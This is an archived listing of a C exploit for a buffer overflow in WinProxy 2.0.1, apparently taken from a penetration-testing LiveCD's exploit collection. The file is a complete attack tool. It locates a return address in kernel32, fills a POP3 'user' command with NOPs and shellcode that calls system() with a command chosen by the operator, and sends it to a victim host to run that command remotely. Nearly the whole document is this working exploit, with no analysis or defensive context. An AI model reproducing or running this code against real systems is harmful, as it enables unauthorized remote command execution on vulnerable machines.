home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / proxy / winproxy / swwpbof.c < prev   
Encoding:
C/C++ Source or Header  |  2005-02-12  |  5.2 KB  |  184 lines
  1. /*=========================================================================
  2. ====
  3.    WinProxy 2.0.1 Overflow Exploit
  4.    The Shadow Penguin Security (http://shadowpenguin.backsection.net)
  5.    Written by UNYUN (shadowpenguin@backsection.net)
  6.   =========================================================================
  7. ====
  8. */
  9.  
  10.  
  11. #include    <stdio.h>
  12. #include    <string.h>
  13. #include    <windows.h>
  14. #include    <winsock.h>
  15.  
  16.  
  17. #define     PORT            110
  18. #define     MAXBUF          700
  19. #define     MAXPACKETBUF    32000
  20. #define     RETADR          312
  21. #define     JMPADR          308
  22. #define     CODEOFS         316
  23. #define     JMPEAX_1        0xff
  24. #define     JMPEAX_2        0xe3
  25. #define     NOP             0x90
  26. #define     KERNEL_NAME     "kernel32.dll"
  27.  
  28.  
  29. unsigned char exploit_code[200]={
  30. 0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,
  31. 0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,
  32. 0xBF,0xFF,0xD0,0x8B,0xD0,0x52,0x43,0x53,
  33. 0x52,0x32,0xE4,0x83,0xC3,0x06,0x88,0x23,
  34. 0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,
  35. 0xF0,0x5A,0x43,0x53,0x52,0x32,0xE4,0x83,
  36. 0xC3,0x04,0x88,0x23,0xB8,0x28,0x6E,0xF7,
  37. 0xBF,0xFF,0xD0,0x8B,0xF8,0x43,0x53,0x83,
  38. 0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,
  39. 0x33,0xC0,0x50,0xFF,0xD7,0xE8,0xB0,0xFF,
  40. 0xFF,0xFF,0x00};
  41. unsigned char cmdbuf[200]="msvcrt.dll.system.exit.";
  42.  
  43.  
  44. unsigned int search_mem(unsigned char *st,unsigned char *ed,
  45.                 unsigned char c1,unsigned char c2)
  46. {
  47.     unsigned char   *p;
  48.     unsigned int    adr;
  49.  
  50.  
  51.     for (p=st;p<ed;p++)
  52.         if (*p==c1 && *(p+1)==c2){
  53.             adr=(unsigned int)p;
  54.             if ((adr&0xff)==0) continue;
  55.             if (((adr>>8)&0xff)==0) continue;
  56.             if (((adr>>16)&0xff)==0) continue;
  57.             if (((adr>>24)&0xff)==0) continue;
  58.             return(adr);
  59.         }
  60.     return(0);
  61. }
  62.  
  63.  
  64. main(int argc,char *argv[])
  65. {
  66.     SOCKET               sock;
  67.     SOCKADDR_IN          addr;
  68.     WSADATA              wsa;
  69.     WORD                 wVersionRequested;
  70.     unsigned int         i,kp,ip,p1,p2,p;
  71.     unsigned int         pretadr;
  72.     static unsigned char buf[MAXBUF],packetbuf[MAXPACKETBUF],*q;
  73.     struct hostent       *hs;
  74.     MEMORY_BASIC_INFORMATION meminfo;
  75.  
  76.  
  77.     if (argc<3){
  78.         printf("usage: %s VictimHost Command\n",argv[0]);
  79.         exit(1);
  80.     }
  81.     if ((void *)(kp=(unsigned int)LoadLibrary(KERNEL_NAME))==NULL){
  82.         printf("Can not find %s\n",KERNEL_NAME);
  83.         exit(1);
  84.     }
  85.  
  86.  
  87.     VirtualQuery((void *)kp,&meminfo,sizeof(MEMORY_BASIC_INFORMATION));
  88.     pretadr=0;
  89.     for (i=0;i<meminfo.RegionSize;i++){
  90.         p=kp+i;
  91.         if ( ( p     &0xff)==0
  92.           || ((p>>8 )&0xff)==0
  93.           || ((p>>16)&0xff)==0
  94.           || ((p>>24)&0xff)==0) continue;
  95.         if (*((unsigned char *)p)==JMPEAX_1 && *(((unsigned char *)p)+1)==
  96. JMPEAX_2) pretadr=p;
  97.     }
  98.     printf("RETADR         : %x\n",pretadr);
  99.     if (pretadr==0){
  100.         printf("Can not find codes which are used by exploit.\n");
  101.         exit(1);
  102.     }
  103.  
  104.  
  105.     wVersionRequested = MAKEWORD( 2, 0 );
  106.     if (WSAStartup(wVersionRequested , &wsa)!=0){
  107.         printf("Winsock Initialization failed.\n"); return -1;
  108.     }
  109.     if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){
  110.         printf("Can not create socket.\n"); return -1;
  111.     }
  112.     addr.sin_family     = AF_INET;
  113.     addr.sin_port       = htons((u_short)PORT);
  114.     if ((addr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
  115.             if ((hs=gethostbyname(argv[1]))==NULL){
  116.                 printf("Can not resolve specified host.\n"); return -1;
  117.             }
  118.             addr.sin_family = hs->h_addrtype;
  119.             memcpy((void *)&addr.sin_addr.s_addr,hs->h_addr,hs->h_length);
  120.     }
  121.     if (connect(sock,(LPSOCKADDR)&addr,sizeof(addr))==SOCKET_ERROR){
  122.         printf("Can not connect to specified host.\n"); return -1;
  123.     }
  124.  
  125.  
  126.     memset(buf,NOP,MAXBUF); buf[MAXBUF-1]=0;
  127.     for (i=0;i<10;i++) memset(buf+300+i*10,0x40+i,10);
  128.  
  129.  
  130.     ip=pretadr;
  131.     buf[RETADR  ]=ip&0xff;
  132.     buf[RETADR+1]=(ip>>8)&0xff;
  133.     buf[RETADR+2]=(ip>>16)&0xff;
  134.     buf[RETADR+3]=(ip>>24)&0xff;
  135.     buf[JMPADR  ]=0xeb;
  136.     buf[JMPADR+1]=0x06;
  137.     buf[RETADR+6]=0xcd;
  138.     buf[RETADR+7]=0x01;
  139.  
  140.  
  141.     p1=(unsigned int)GetProcAddress((HINSTANCE)kp,"LoadLibraryA");
  142.     p2=(unsigned int)GetProcAddress((HINSTANCE)kp,"GetProcAddress");
  143.  
  144.  
  145.     printf("LoadLibraryA   : %x\n",p1);
  146.     printf("GetProcAddress : %x\n",p2);
  147.     if ( ( p1     &0xff)==0
  148.       || ((p1>>8 )&0xff)==0
  149.       || ((p1>>16)&0xff)==0
  150.       || ((p1>>24)&0xff)==0
  151.       || ( p2     &0xff)==0
  152.       || ((p2>>8 )&0xff)==0
  153.       || ((p2>>16)&0xff)==0
  154.       || ((p2>>24)&0xff)==0){
  155.         printf("NULL code is included.\n");
  156.         exit(1);
  157.     }
  158.  
  159.  
  160.     strcat(cmdbuf,argv[2]);
  161.     strcat(exploit_code,cmdbuf);
  162.     exploit_code[0x0d]=p1&0xff;
  163.     exploit_code[0x0e]=(p1>>8)&0xff;
  164.     exploit_code[0x0f]=(p1>>16)&0xff;
  165.     exploit_code[0x10]=(p1>>24)&0xff;
  166.     exploit_code[0x21]=exploit_code[0x35]=p2&0xff;
  167.     exploit_code[0x22]=exploit_code[0x36]=(p2>>8)&0xff;
  168.     exploit_code[0x23]=exploit_code[0x37]=(p2>>16)&0xff;
  169.     exploit_code[0x24]=exploit_code[0x38]=(p2>>24)&0xff;
  170.     exploit_code[0x41]=strlen(argv[2]);
  171.  
  172.  
  173.     memcpy(buf+CODEOFS,exploit_code,strlen(exploit_code));
  174.  
  175.  
  176.     sprintf(packetbuf,"user %s\r\n",buf);
  177.     send(sock,packetbuf,strlen(packetbuf),0);
  178.     Sleep(3000);
  179.     closesocket(sock);
  180.     printf("Done.\n");
  181.     return FALSE;
  182. }
  183.  
  184.